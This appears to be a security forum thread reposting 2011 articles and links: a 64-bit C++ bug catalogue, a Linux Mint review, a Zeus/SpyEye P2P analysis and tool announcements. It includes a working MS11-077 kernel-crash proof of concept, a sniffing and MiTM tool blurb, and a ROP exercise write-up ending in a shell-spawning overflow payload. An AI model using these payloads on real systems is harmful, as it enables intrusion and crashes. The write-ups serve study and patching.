Nytro

O sa ma uit in baza de date sa vad daca se poate fara foarte mult chin. Si nu ma refer la reputatie, nu e o problema asta, ci la posturi.

A bit away from Kernel execution By ar1vr (01/12/2011) picturoku.blogspot.com Whitepaper called A Bit Away From Kernel Execution. A 'write-what-where' kernel memory overwrite tale. Download: http://dl.packetstormsecurity.net/papers/general/kernel-execution.pdf

[h=1]A Collection of Examples of 64-bit Errors in Real Programs[/h] Abstract Introduction Example 1. Buffer overflow Example 2. Unnecessary type conversions Example 3. Incorrect #ifdef's Example 4. Confusion of int and int* Example 5. Using deprecated (obsolete) functions Example 6. Truncation of values at an implicit type conversion Example 7. Undefined functions in C Example 8. Remains of dinosaurs in large and old programs Example 9. Virtual functions Example 10. Magic constants as parameters Example 11. Magic constants denoting size Example 12. Stack overflow Example 13. A function with a variable number of arguments and buffer overflow Example 14. A function with a variable number of arguments and wrong format Example 15. Storing integer values in double Example 16. Address arithmetic. A + B != A - (- Example 17. Address arithmetic. Signed and unsigned types. Example 18. Address arithmetic. Overflows. Example 19. Changing an array's type Example 20. Wrapping a pointer in a 32-bit type Example 21. Memsize-types in unions Example 22. An infinity loop Example 23. Bit operations and NOT operation Example 24. Bit operations, offsets Example 25. Bit operations and sign extension Example 26. Serialization and data exchange Example 27. Changes in type alignment Example 28. Type alignments and why you mustn't write sizeof(x) + sizeof(y) Example 29. Overloaded functions Example 30. Errors in 32-bit units working in WoW64 Summary References [h=2]Abstract[/h] This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, however, it will be useful for other programmers as well. [h=2]Introduction[/h] Our company OOO "Program Verification Systems" develops a special static analyzer Viva64 that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here: http://www.viva64.com/pvs-studio/download/. Online: http://www.viva64.com/en/a/0065/print/

[h=1]Is Linux Mint an Ubuntu-Killer?[/h] User traffic and key design changes suggest that Mint is a serious challenger to the King of Linux. Suddenly, everyone's talking about Linux Mint. A six-year-old distribution based on Ubuntu and Debian, Linux Mint has always enjoyed considerable popularity, but, in the last month, it has started receiving dramatically more attention. This attention has two main reasons. First, pundits have been debating the meaning (if any) of the fact that Linux Mint has received over two and a half times more page views than Ubuntu on Distrowatch for the past month. Second, Linux Mint's new 12.0 release, codenamed "Lisa," features the Mint GNOME Shell Extensions (MGSE), a set of modifications that offer alternatives to the most obvious cosmetic and conceptual changes in the GNOME 3 release series. MGSE offers a desktop much like the GNOME 2 series while preserving the most useful of GNOME 3's innovations. This development is so bizarre that it could only make sense in the free and open source software community. Still, the combination of possible new popularity and MGSE is enough to start the community speculating whether Ubuntu users, discontent with the new Unity shell, are looking to Linux Mint as a replacement. At first glance, the idea is absurd. Given that MGSE modifies the GNOME 3.2 release, you might convincingly speculate that Linux Mint has provided the solution for the many who are unhappy with GNOME's current directions. But challenge Ubuntu? Canonical, Ubuntu's commercial arm, claims twenty million users, and is promoting the distribution heavily. By contrast, Linux Mint is a much smaller, non-commercial organization that appears to be less organized, and to have fewer resources to draw upon. In fact, it relies on donations and ingenuity for funding. Yet is the idea even technically possible? Certainly Linux Mint's team and its supporters think so, considering that for several years they have been calling Linux Mint the fourth most widely used operating system, which sounds like a deliberate challenge to Ubuntu's claim to be the third. One way or the other, a closer look seems in order. Although Linux Mint offers a Debian-based edition, the majority of its releases are based on Ubuntu. Nor, so far, is the new release an exception. On the one hand, Linux Mint and Ubuntu share the same installer and boot in more or less the same time on the same machine. They share, too, the same array of GNOME-based software, down to Ubuntu 11.10's replacement of Evolution with Mozilla Thunderbird for email. Both offer fallback environments for systems without 3-D hardware acceleration, and proprietary drivers for video and wLinux Mint and MGSE vs. Ubuntu and Unityireless cards. Linux Mint 12 even introduces a new music player indicator reminiscent of Unity's. Neither includes provision for applets on the panel or application launchers on the desktop, the way that their mutual ancestor GNOME 2 did, although both do support folder and document desktop launchers. On the other hand, most of the differences are minimal. The package managers differ only in their branding, with Linux Mint's being less blaring and obtrusive, as usually happens with a community-based distribution. Admittedly, Linux Mint's system requirements list 500 megabytes of RAM compared to Ubuntu's 384. I suspect, though, that Linux Mint is simply being more realistic about how much memory is needed to do normal productivity without being completely frustrated. [h=4]MGSE vs. Unity[/h] So far as applications are concerned, the greatest difference is that Linux Mint defaults to the little-known DuckDuckGo search engine, whose advertising revenue Linux Mint shares. This is the closest that Linux Mint comes to matching Unity's extensive branding, but the exception is worthwhile. DuckDuckGo offers more options, greater privacy, and noticeably different search results than Google's, and needs only image searching to be a complete replacement. However, the greatest differences between Ubuntu and Linux Mint are in the user experience. After all, Unity is a simplification of the desktop inspired by the interfaces of mobile devices, while Linux Mint is a fusion of GNOME 2 and 3. This fusion is accomplished by adding MGSE options to the Shell Extensions tab for GNOME Tweak, which an increasing number of users consider an essential addition to GNOME 3. MGSE includes extensions to restore many of the features of GNOME 2 while converting GNOME 3 innovations such as the overview mode to options rather than unavoidable necessities. When toggled on, each extension takes effect immediately, allowing you to evaluate them without delay. For many, the most important of MGSE's innovations will probably be the bottom panel, its menu and its notification tray. Together, these extensions are enough to allow users to work on a single screen, instead of constantly switching to the overview mode to open applications or switch virtual workspaces, as GNOME 3 requires. These innovations do not fully restore GNOME 2 functionality, since the panel is not customizable, but they might minimally satisfy those discontented with Unity or GNOME 3. The menu included with Linux Mint 12 is reminiscent of openSUSE's Slab or KDE's Lancelot. It is less obtrusive than both GNOME 2's classical menu and the screen overlay that replaces the menu in Unity. The notification tray is a similar combination of the traditional and the innovative, invisible until toggled by the icon on the far right of the bottom panel, and as long as the bottom panel itself. This arrangement eliminates the usual problem of some of the tray being invisible, making it an improvement over both GNOME and Unity. Yet what is just as important as the extensions themselves is the fact they partially restore the most important feature that Unity often removes or limits: the freedom to work the way you want. In Linux Mint, you can, for instance, work with the bottom panel menu, or go to the GNOME 3 overview to open applications. Similarly, you can work with three virtual workspaces that are part of the panel, enabling the GNOME 3 overview mode to allow the shell to manage virtual workspaces, or use both at once. Although this range of choice needs to be extended before it can match the flexibility of GNOME 2, it is far more than anything provided by Unity, which generally imposes a single way to work on all users, regardless of their preferences. [h=4]Going Down the Road[/h] For those who already use Linux, the trend of Linux Mint is promising. MGSE in particular suggests that Linux Mint is in tune with the existing user base, a group that seems to value the ability to work in their preferred style more than any other factor. At the same time, I suspect that many existing users may feel that Linux Mint does not go far enough in its tendencies. While many will find it an improvement over Ubuntu with Unity, the improvement may not be great enough to be worth the effort of switching distributions. I wonder, too, whether the same qualities that might endear Linux Mint to existing users -- or, at least, make it the lesser of several evils -- will appeal equally to the new users that Unity seems calculated to attract. So far as the Distrowatch figures have meaning, they may reflect only the curiosity of existing users. For now, the most that can be said is that Linux Mint seems to be heading for a destination of which many existing users approve. Unfortunately, in the current release, it has moved part ways down the road but still has a ways to travel. To me, the important question is whether it can arrive before community interest shifts. Also (the question nobody is asking in the focus on Ubuntu) will GNOME or other distributions seize on MGSE as a graceful way of recovering from the embarrassing reception of GNOME 3? Sursa: Is Linux Mint an Ubuntu-Killer? - Datamation

Database Browser Portable 4.0.0.2 (multi-protocol database client) Released Submitted by John T. Haller on December 2, 2011 - 1:22pm Database Browser Portable 4.0.0.2 has been released. Database Browser Portable is an easy to use tool allows you to connect to any database (Oracle, MS-SQL, MySQL, Firebird, etc) and browse or modify data, run sql scripts, export and print data. This release adds suuport for Unicode in MySQL, PostreSQL, SLite and Interbase connections and encrypts connection details. It's packaged in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. Database Browser Portable is freeware for both commercial and personal use. This application is packaged for portable use by the publisher, DB Software Laboratory. Update automatically or install from the app store in the PortableApps.com Platform. Features Works directly with Oracle, MS Sql Server, ODBC, MySql, PostgreSQL, SQLite, Ole DB, Interbase and Firebird Support for ODBC connection strings Unlimited number of connections One click switching from one connection to another One click table browsing Data browsing Data exports into CSV, Excel, Html files Execution history SQL Builder with wide range of supported databases Execution Log Incremental Table Search Download: http://portableapps.com/bouncer?t=http%3A%2F%2Fwww.dbsoftlab.com%2Fdmdocuments%2FDatabaseBrowserPortable_4.0.0.2_English.paf.exe Sursa: Database Browser Portable 4.0.0.2 (multi-protocol database client) Released | PortableApps.com - Portable software for USB, portable and cloud drives

MS11-077: From Patch to Proof-of-Concept Posted by Bharat Jogi on Dec 2, 2011 8:06:08 AM [h=3]Abstract:[/h]In the October 2011 Patch Tuesday, Microsoft released update MS11-077 to fix a null pointer de-reference vulnerability (CVE-2011-1985). In this paper, we will reverse engineer the patch for MS11-077 (CVE-2011-1985) to get a better understanding of the vulnerability fixed by this patch. [h=3]Sample:[/h]Unpatched File: win32k.sys (version: 5.1.2600.6119) Patched File: win32k.sys (version: 5.1.2600.6149) [h=3]Patch Analysis:[/h] Using binary diff, we can see the changes that were made to the vulnerable file win32k.sys. Figure 1 below shows the TurboDiff results. Figure 1: TurboDiff Results As you can see in Figure 1 above, while most of the functions are identical, there are a couple of functions that look ‘suspicious’ and some others that are ‘changed’. The large number of changes is not a surprise because Microsoft has fixed four different vulnerabilities with this patch. Taking a closer look at all the functions that were changed, you will see that the changes made to functions ‘NtUserfnINLBOXSTRING’, ‘NtUserfnSENTDDEMSG’ and ‘NtUserfnINCBOXSTRING’ are all the same. Figure 2, below shows the changes made. Figure 2: Binary Diff for function NtUserfnINLBOXSTRING(x,x,x,x,x). Looking at the binary difference, it is clear that the patch is checking that the arg_0 (first argument passed to the function) is 0xFFFFFFFF and if it is 0xFFFFFFFF, call _UserSetLastError() with 0x578 and return from the function. This gives us two pointers to exploit the vulnerability. The first is that the arg_0 has to be 0xFFFFFFFF. The second pointer is that the patched function bails out setting system error code to 0x578. This is the system error code for ERROR_INVALID_WINDOW_HANDLE, thus hinting us that the argument is of type HWND. [h=3]Quest:[/h]Everything until now is pretty simple and it looks easy to exploit this vulnerability. However, the really challenge here is finding a user mode function that will call the vulnerable function. It turns out this isn’t very straightforward, and we will need to understand the Windows GUI subsystem. [h=3]Win32 GDI Subsystem:[/h] Figure 3: Win32 interfaces and their relation to the kernel components The GDI (Graphics Device Interface) APIs are implemented in the GDI32.DLL and include all the low-level graphics services such as drawing lines, displaying BMPs etc. The GDI APIs make system calls into the WIN32k.sys to implement most APIs. The User APIs are implemented in USER32.DLL module and include all higher-level GUI-related services such as window management, menus, dialog boxes, user controls etc. USER heavily relies on GDI to do its work. One of the most important means of communication in Windows is Messages. Windows-based applications are event-driven and act upon messages sent to them. The way you program in Windows is by responding to events. These events are called Messages. Messages can signal many events, caused by the user, the operating system, or another program. Each window, owned by a thread, has a window procedure (function) for processing input messages and dispatching them to the operating system. If a thread accesses any of the user interface or GDI system calls (handled by win32k.sys), the kernel creates a THREADINFO structure which holds three message queues used to process input. These are the input queue, the post queue, and the send queue. The input queue is primarily used for mouse and keyboard messages, while the send and post queues are used for synchronous (send) and asynchronous (post) window messages respectively. Asynchronous messages are used in one-way communication between window threads and are typically used to notify a window to perform a specific task. Asynchronous messages are handled by the PostMessage APIs and are sent to the post queue of the receiving thread. The sender does not wait for the processing to complete in the receiving thread and thus returns immediately. Synchronous messages differ from asynchronous messages as the sender typically waits for a response to be provided or a timeout to occur before continuing execution. Thus, they require mechanisms to ensure that the threads are properly synchronized and in the expected state. Synchronous messages use the SendMessage APIs which in turn directs execution to the NtUserMessageCall system call in win32k.sys. This information is enough for us to take our analysis further. [h=3]Hitting the vulnerable function:[/h]As described above, the message mechanism plays an integral role in the user interface component of the Windows operating system. There are many different types of message codes and those less than 0x400 are reserved by operating system. Depending upon the type of message code, NtUserMessageCall() calls a particular function to handle the message. Let’s take a closer look at how NtUserMessageCall, calls the appropriate functions to handle different message types. Figure 4: Assembly code for NtUserMessageCall() As seen in the above figure, the function first checks if the Msg code is less than 0x400(EAX has the Msg code) to check if it’s a system message code. Each Message code denotes an index in the win32k!MessageTable byte array. This byte value is than logically AND to 0x3F, since the last 6bits of the byte obtained from win32k!MessageTable determines the function that will handle the Message code. _gapfnMessageCall is a function table that stores address of all the functions that can handle different messages. See Figures below to see how _gapfnMessageCall table looks. Figure 5: _gapfnMessageCall function table Thus if we can get the index of our vulnerable function in _gapfnMessageCall, we can easily compute how we can call the vulnerable function. The index of our vulnerable functions are 29(0x1D), 27(0x27) and 43(0x2B) for NtUserfnINLBOXSTRING(),NtUserfnINCBOXSTRING() and NtUserfnSENTDDEMSG() respectively. Following is the pseudo code to compute Msg codes for hitting the vulnerable function: for i in range[0x00 to 0x400] if MessageTable & 0x3F == 0x1D //NtUserfnINLBOXSTRING() Hit! if MessageTable & 0x3F == 0x1B //NtUserfnINCBOXSTRING() Hit! if MessageTable & 0x3F == 0x2B //NtUserfnSENTDDEMSG() Hit! [h=3]Proof of Concept:[/h] [FONT=Courier New]#include <windows.h> [/FONT] [FONT=Courier New]int main(){[/FONT] [FONT=Courier New] SendNotifyMessageA((HWND)0xFFFF,0x143,0,0); [/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]OR[/FONT] [FONT=Courier New]#include <windows.h>[/FONT] [FONT=Courier New]int main(){[/FONT] [FONT=Courier New] SendMessageCallbackA((HWND)0xFFFF,0x143,0,0);[/FONT] [FONT=Courier New]}[/FONT] Other Possible Msg codes for hitting vulnerable functions are: [FONT=Courier New]0x143, 0x14A, 0x14C, 0x14D, 0x158, 0x180, 0x181, 0x18C, 0x18F, 0x1A2, 0x1AA, 0x1AB, 0x1AC, 0x1AD, 0x3E2, 0x3E3, 0x3E5, 0x3E6, 0x3E7, 0x3E8 [/FONT] [h=3]Conclusion:[/h]As we've seen above, it is pretty easy to trigger this vulnerability. We would recommend our customers to scan their environment for QID 90746 and apply this security update as soon as possible. [h=3]References:[/h]http://www.codeproject.com/KB/dialog/messagehandling.aspx http://c0decstuff.blogspot.com/2011/03/desynchronization-issues-in-windows.html Reversing: Secrets of Reverse Engineering - Wikipedia, the free encyclopedia http://doxygen.reactos.org/d3/d69/include_2reactos_2win32k_2ntuser_8h_a14fd6fae7992b1218ed08fbaec9396b8.html http://uninformed.org/index.cgi?v=10&a=2#MSFT:2 Sursa: https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept

Gera’s Insecure Programming Advance Buffer Overflow #1 (ROP NX/ASLR Bypass) Posted on November 27, 2011 by lixor_ After my last post, I decided to go straight into the Advance Buffer Overflow (ABO) section and practice more ROP. The first ABO exercise was a straight-forward buffer overflow. ABO #1 source code: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10[/TD] [TD=class: code]/* abo1.c * * specially crafted to feed your brain by gera */ /* Dumb example to let you get introduced... */ int main(int argv,char **argc) { char buf[256]; strcpy(buf,argc[1]); }[/TD] [/TR] [/TABLE] The environment, as usual, was Debian 2.6.32 with NX and ASLR enabled. The binary can be found here. [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]lixor@debian:~$ uname -a Linux debian 2.6.32-5-686-bigmem #1 SMP Thu Nov 3 05:12:00 UTC 2011 i686 GNU/Linux[/TD] [/TR] [/TABLE] The technique that will be used throughout this post is known as “GOT dereferencing.” For the interested reader, you can read about the technique here. The return address can be found at 268 bytes. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(ruby -e 'print "A"*256 +"BBBBCCCCDDDDEEEE"') Segmentation fault (core dumped) lixor@debian:~/InsecureProgramming/abo1$ gdb -q -nx -batch abo1 core warning: Can't read pathname for load map: Input/output error. Core was generated by `./abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x45454545 in ?? () lixor@debian:~/InsecureProgramming/abo1$[/TD] [/TR] [/TABLE] I needed the use of two functions for this technique: the targeted function and the pivot function. I used VNSECURITY ROPEME tool to search for gadgets. The binary was rather small so finding certain gadgets was difficult. I was able to find some useful gadgets. The entire gadget list can be found here. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code](1) 0x8048392L: pop ebx ; pop ebp ;; (2) 0x804838bL: xchg ebp eax ; add al 0x8 ; add [ebx+0x5d5b04c4] eax ;; (1) 0x8048392L: pop ebx ; pop ebp ;; (3) 0x804847eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;; (4) 0x80483bfL: call eax ; leave ;;[/TD] [/TR] [/TABLE] I needed to perform some dummy calculations for (2) and (3). Gadget (2) accesses a memory location. EBX must be a valid memory location minus 0x5d5b04c4 (to obtain the intended address). A valid location can be found at the relocation table. I chose 0x080495a8 (__gmon_start__) for the first EBX in (2) and 0x080495b0 (strcpy) for the second one in (3). [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ readelf -r abo1 ... 080495a8 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__ ... 080495b0 00000307 R_386_JUMP_SLOT 00000000 strcpy[/TD] [/TR] [/TABLE] The calculations for (2) and (3) are simple as shown: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]#first dummy value for ebx lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495a8-0x5d5b04c4 ' aaa990e4 #real value lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495b0 + 0xb8a0008 ' 138e95b8[/TD] [/TR] [/TABLE] Next, I performed the calculations for the EAX register. EAX will have the offset between system() and strcpy() minus 8 for (2). [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ objdump -T /lib/i686/cmov/libc.so.6 | egrep ' strcpy$|system$' 00072ea0 g DF .text 00000023 GLIBC_2.0 strcpy 00039180 g DF .text 0000007d GLIBC_PRIVATE __libc_system 00039180 w DF .text 0000007d GLIBC_2.0 system lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x00039180-0x00072ea0 - 0x8' fffc62d8 [/TD] [/TR] [/TABLE] Here is a general summary of important values: 1st dummy ebx = 0xaaa990e4 eax = 0xfffc62d8 ebx = 0x138e95b8 The last step was to find a string for system(). A safe option (like in my last post) was to use the string “GNU” from .note.gnu.build-id at 0×08048154. [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ readelf -x .note.gnu.build-id abo1 Hex dump of section '.note.gnu.build-id': 0x08048148 04000000 14000000 03000000 474e5500 ............GNU. 0x08048158 abf92e7c f0e973e4 86c3ba84 9d7a7142 ...|..s......zqB 0x08048168 7122ec44 q".D [/TD] [/TR] [/TABLE] With that, the exercise was completed: [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ ln -s /bin/sh GNU lixor@debian:~/InsecureProgramming/abo1$ export PATH=.:$PATH lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(perl -e 'print "A"x268 ."\x92\x83\x04\x08\xe4\x90\xa9\xaa\xd8\x62\xfc\xff\x8b\x83\x04\x08\x92\x83\x04\x08\xb8\x95\x8e\x13AAAA\x7e\x84\x04\x08MOVEPOPPPOPP\xbf\x83\x04\x08\x54\x81\x04\x08"') $ whoami lixor $ [/TD] [/TR] [/TABLE] Sursa: http://isisblogs.poly.edu/2011/11/27/geras-insecure-programming-advance-buffer-overflow-1-rop-nxaslr-bypass/

Cross Context Scripting with Firefox Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com 21 April 2010 Contents Abstract ............................................................................................................................ 3 1. Introduction .................................................................................................................. 4 1.1 XPCOM Component Model ........................................................................................ 4 1.2 XUL ............................................................................................................................ 4 1.3 Chrome ....................................................................................................................... 5 1.4 XBL - Custom tags........................................................................................................ 5 1.5 XUL Overlay ................................................................................................................ 5 1.6 Themes, Skins and Locales ........................................................................................... 5 2. XCS Cases .................................................................................................................. 6 2.1 Case I: XCS via Event Handlers – Drag and Drop ............................................................. 6 2.2 Case II: Attacking Custom DOM event handlers................................................................ 8 2.3 Case III: Cross Domain Content/Script Include ............................................................... 10 2.4 Case IV: Injection via XBL ........................................................................................... 12 2.5 Case V: Attacking Wrappers ........................................................................................ 14 2.6 Case VI: Attacking XPCOM Components....................................................................... 15 2.7 Case VII: Sandbox Chrome Leakage ............................................................................ 18 2.8 Case VIII: Bypassing nsIScriptableUnescapeHTML.parseFragment() ................................ 19 3. Conclusion ................................................................................................................. 21 4. References ................................................................................................................ 22 Download: http://security-assessment.com/files/documents/whitepapers/Cross_Context_Scripting_with_Firefox.pdf http://security-assessment.com/files/documents/whitepapers/Exploiting_Cross_Context_Scripting_vulnerabilities_in_Firefox.pdf

GenXE - Generate Xss Exploit 0.9.0 Tool: Online Version Download ZIP Version Forum SourceForge Project Homepage Admin LiuDieYu <liudieyuinchina@vip.sina.com> Related links http://crosszone.org http://umbrella.mx.tc Sursa: http://genxe.sourceforge.net/

[h=3]0×375 – 0×07 – Security Considerations for a brave new (IPv6) World[/h]28/11/2011 I finally had the chance to present something at the Thessaloniki Tech Talk Sessions also known as 0×375. The people over there have done a great job, and I truly mean that, bringing tech people together. Almost once a month 2 speakers can present a tech topic they like at an open auditorium inside the Aristotle University of Thessaloniki. On those events people from Thessaloniki, but also from nearby cities, gather and have a great time, not only during the presentations but afterwards as well. I won’t spoil the events that take place during the tech talks, because you should definitely go if you are curious, but I can tell you that it’s not uncommon for as many as 15 to 20 people to go for beers after the talks! So, the past Friday (25/11/2011), me and @apoikos traveled from Athens to Thessaloniki to present at 0×375. My presentation was about some security concepts on IPv6 networks, how old attacks of the IPv4 world transform to new ones on the IPv6 world and about some new ones that will appear on local networks sooner or later. I also had prepared some small live demos, but as always it’s very hard to succeed in a live demo if you don’t quite control the environment. At least some of the stuff I wanted to show were successful, and I’m happy with those. (Thanks to Nuclear for booting his OS X guinea pig) Some apologies…When giving a presentation on IPv6, in an event that has no other introductory IPv6 presentations, I always face the same problem, most people are not very well aware of how different this protocol is from IPv4. When I ask the audience how well do they know IPv6, most people are embarrassed to say they have never actually used it, so the audience stays very, VERY silent. This means that I have to put around 15-20 slides to make a “quick introduction to IPv6?, and this unfortunately takes usually over 30? of presentation time. Some techy/advanced people might be bored with this, but there’s no other way to overcome this “issue”. If you go straight to the point and start discussing about ND ICMPv6 messages most people won’t be able to keep up…so I’m sorry if I made some of the audience get bored by my first slides. I promise that my next talk on 0×375, cause there will surely be a next one, will be less boring for you Thank you all for coming there, I hope you enjoyed it as much as I did! You can find the slides and my live demo notes here: Download: 0×375 – 0×07 – kargig – Security Considerations for a brave new (IPv6) World (pdf) 0×375 – 0×07 – kargig – Security Considerations for a brave new (IPv6) World – live demo notes (txt) P.S. I’ve started collecting some interesting (for me) presentations regarding IPv6 topics at void.gr/kargig/ipv6/. Check them out if you like. Sursa: http://www.void.gr/kargig/blog/2011/11/28/0x375-0x07-security-considerations-for-a-brave-new-ipv6-world/

Intercepter-NG New Sniffing Tool [intercepter-NG] offers the following features: + Sniffing passwords\hashes of the types: ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP \WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\IRC\MRA + Promiscuous-mode\ARP\DHCP\Gateway\Smart Scanning + Raw mode (with pcap filter) + eXtreme mode + Capturing packets and post-capture (offline) analyzing + Remote traffic capturing via RPCAP daemon + NAT + ARP MiTM + DNS over ICMP MiTM + DHCP MiTM + SSL MiTM + SSL Strip Works on Windows NT(2K\XP\2k3\Vista\7). Download: http://intercepter.nerf.ru/Intercepter-NG.v09.zip Sursa: http://thehackernews.com/2011/11/intercepter-ng-new-sniffing-tool.html

Attacking NFC Mobile Phones Collin Mulliner Fraunhofer SIT EUSecWest May 2008 London, UK A first look at NFC Phone Security Some Tools, PoCs, and a Small Survey Agenda ? Introduction to NFC ? NFC phones and data formats ? An NFC Security Toolkit ? Analyzing an NFC Mobile Phone ? Attacking NFC services in the field - a survey ? Notes from the lab ? Conclusions Download: http://mulliner.org/nfc/feed/collin_mulliner_eusecwest08_attacking_nfc_phones.pdf

[h=1]Cracking into the New P2P Variant of Zeusbot/Spyeye[/h] Created: 28 Nov 2011 Andrea Lelli Recently, Symantec observed a modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient. (Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.) To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server. Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime. Here's how it works: When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data. To initiate a communication the bot sends out a “portknocking” data packet that contains a header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines. More UDP packets may follow the portknocking, exchanging different data (the purpose of which is still under investigation). Figure 1: Communication When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive both a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server. Interestingly, the SHA-1 of the infected machine is not communicated at this stage (in our tests it was not sent to the C&C at any time). This may mean the C&C server is not involved in controlling the peers (e.g. collecting of all SHA-1 and updating the list of available peers) and therefore the P2P network would be completely autonomous. We have found several samples in the wild which all seem to originate from a single source. These samples are all packed with the same techniques, and the binary code of the unpacked virus is almost identical (differing in only the smallest of details). This leads us to believe these samples are coming from the same source code, but are recompiled with small changes. We suspect those responsible for spreading this new variant may have access to the source code and upgraded the bot with all the new features. Our samples also all shared the same RC4 substitution box used to decrypt configuration data and we also ran some different random samples and the configuration data they downloaded is similar in all cases. All these details indicate this Trojan seems to be a private build from those who had access to source code and want to target specific websites (lots of Italian ones). We first observed this threat on September 13, 2011. This date also matches the time-date stamp of the first samples found, when we believe the variant started spreading. At the time of writing this blog, the threat does not seem prevalent with only a limited number of samples in the wild (this may change in time, of course). This does not mean the botnet is dead: the P2P network is alive and we have decoded the latest data from the configuration files which contains the frequently updated C&C server address (the C&C server is currently active using a November-registered domain name). In total we observed 327 unique peers, so an estimation of the number of infected machines could be anywhere from 500 to 1000. Figure 2: Infection geographical distribution The modified variant of Zeusbot/Spyeye which uses a P2P network is indeed an improvement, but comes with drawbacks as well. The communication protocol lacks proper authentication so a rogue client may connect to the network and communicate with peers. The configuration file is not authenticated, since it is encrypted with a symmetric algorithm, meaning a rogue configuration file would be easy to forge. Any infected client can become part of the list of peers actively exchanged by the drones. A rogue client may infiltrate the P2P network, forge a rogue certificate, and distribute it to other bots—which means the rogue would be able to specify a new C&C server and hijack the entire network. At this stage we cannot tell if this variant will become a mainstream implementation of the bot or simply die off. We will keep an eye on it in order to detect all new variants. It has been reported that this threat has been spreading through spam emails and drive-by download exploits, so, in order to mitigate the risk of infection, we recommend users keep their computers updated and beware of email from unknown or unverified sources. Additional details from the analysis are available to our DeepSight subscribers. Sursa: http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye

